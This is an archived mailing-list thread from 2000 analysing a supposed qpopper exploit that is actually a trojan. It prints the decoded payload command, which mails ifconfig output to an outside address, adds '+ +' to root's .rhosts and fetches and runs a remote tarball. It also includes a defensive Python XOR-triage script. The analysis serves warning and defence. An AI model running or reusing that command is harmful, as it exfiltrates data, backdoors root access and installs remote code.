Vulnerability Development mailing list archives
Re: QPOP2.5* exploit ??
From: llmora () S21SEC COM (Lluis Mora)
Date: Mon, 15 May 2000 10:23:43 +0200
> I have yet to totally decode the asm, and don't think I will bother to go any further, so it is possible it does more than just this, however it quite obviously isn't a straight qpopper exploit. Anyone tried against a qpopper install to see if it executes?
If I were you I wouldn't give it a try, as all it does is execute the shellcode _locally_ (the box trying to run the exploit), not the remote machine. It's a trojan as has been previously noticed by rpc <h () ckz org>.

    (char *)qpop_proc = shellcode; /* Points the qpop_proc function to the shellcode */
    [...]
    /* Tries an always unsuccessful exploit */
    [...]
    quit(0); /* Before exiting, it executes quit() */

    void quit(int x)
    {
      qpop_proc(); /* which contains a call to the shellcode, executed in the local machine */
      exit(x);
    }

Cheers,

Lluis Mora
llmora () s21sec com

-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM] On Behalf Of phi-vulndev () EXORSUS NET
Sent: Monday, 15 May 2000 2:36
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: QPOP2.5* exploit ??
this has been found in the wild, however there seems to be a trojan in the shellcode. Popper 2.5* has been thought to be safe. I would not recommend running this on your own machine unless you crack the shellcode and see what it does.
Trivial xor of 2 encoding of part of the shellcode reveals:

    /bin/sh -c /sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null; echo '+ +' >> ~root/.rhosts; rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar; tar -xvf solwar* >> /dev/null; cd solwar; chmod +x solwar.sh; ./solwar.sh >> /dev/null; cd ..; rm -rf solwar*;

I have yet to totally decode the asm, and don't think I will bother to go any further, so it is possible it does more than just this, however it quite obviously isn't a straight qpopper exploit. Anyone tried against a qpopper install to see if it executes?

Phi.
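The decoding step described above (a single-byte XOR over part of the shellcode array) can be done statically on the source file, without compiling or running it. The following is an added example, not part of either post or of the trojaned file; the marker list, the function names and the sample array are assumptions constructed for illustration.

```python
import re

# Substrings suggesting a decoded buffer holds a command line rather than
# machine code (assumed marker list, taken from the command quoted above).
MARKERS = (b"/bin/sh", b"/sbin/", b".rhosts", b"mail -s", b"rcp ", b"chmod ")
PRINTABLE = re.compile(rb"[\x20-\x7e]{8,}")   # runs of 8+ printable ASCII bytes
LITERALS = re.compile(r'(?:"(?:\\x[0-9a-fA-F]{2})+"\s*)+')  # adjacent "\xNN" literals


def c_string_bytes(source):
    """Return the raw bytes of each run of adjacent \\xNN string literals."""
    blobs = []
    for run in LITERALS.findall(source):
        hexes = re.findall(r"\\x([0-9a-fA-F]{2})", run)
        blobs.append(bytes(int(h, 16) for h in hexes))
    return blobs


def xor_triage(source):
    """Try every single-byte XOR key (0 = plaintext) on each byte array and
    return (key, text) for printable runs that look like shell commands."""
    hits = []
    for blob in c_string_bytes(source):
        for key in range(256):
            decoded = bytes(b ^ key for b in blob)
            for run in PRINTABLE.findall(decoded):
                if any(marker in run for marker in MARKERS):
                    hits.append((key, run))
    return hits


def sample_source():
    """Constructed input: a harmless string XOR-encoded with key 2, placed
    after filler bytes standing in for machine code."""
    hidden = bytes(b ^ 2 for b in b"/bin/sh -c echo constructed-sample")
    blob = b"\x90\x90\xeb\x1f" + hidden + b"\x00"
    body = "".join("\\x%02x" % b for b in blob)
    return 'char shellcode[] =\n  "%s"\n  "%s";\n' % (body[:40], body[40:])


if __name__ == "__main__":
    for key, text in xor_triage(sample_source()):
        print("key=%d: %s" % (key, text.decode("ascii")))
```

A hit on a downloaded proof-of-concept means the byte array carries a command string for the machine that runs it, which is the behaviour both posts warn about.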